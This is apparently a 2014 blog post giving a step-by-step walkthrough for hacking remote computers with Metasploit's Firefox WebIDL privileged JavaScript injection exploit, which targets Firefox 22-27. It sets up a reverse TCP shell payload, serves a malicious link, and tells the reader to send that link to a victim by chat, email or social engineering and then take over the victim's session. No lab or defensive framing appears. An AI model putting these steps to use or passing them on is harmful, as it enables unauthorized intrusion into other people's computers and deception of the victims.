Sunday, 14 September 2014

How to Hack Remote Windows, Linux or MAC PC using Firefox WebIDL Privileged Javascript Injection ??



This exploit gains remote code execution on Firefox 22-27 by abusing two separate privilege escalation vulnerabilities in Firefox’s Javascript APIs

Exploit Targets:-
Firefox 22-27

Windows XP SP 3

Windows 7

Linux

OSX

Requirement:-
Attacker: kali Linux

Victim PC: Windows 7





*steps* 

1.Open Kali terminal type

     msfconsole

2.Now type
  
    use exploit/multi/browser/firefox_webidl_injection

3.msf exploit (firefox_webidl_injection)>set payload firefox/shell_reverse_tcp

4.msf exploit (firefox_webidl_injection)>set lhost 192.168.0.5 (IP of Local Host)

5.msf exploit (firefox_webidl_injection)>set srvhost 192.168.0.5

6.msf exploit (firefox_webidl_injection)>set uripath /

7.msf exploit (firefox_webidl_injection)>exploit

8.Now an URL you should give to your victim http://192.168.0.5:8080/

Send the link of the server to the victim via chat or email or any social engineering technique

Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)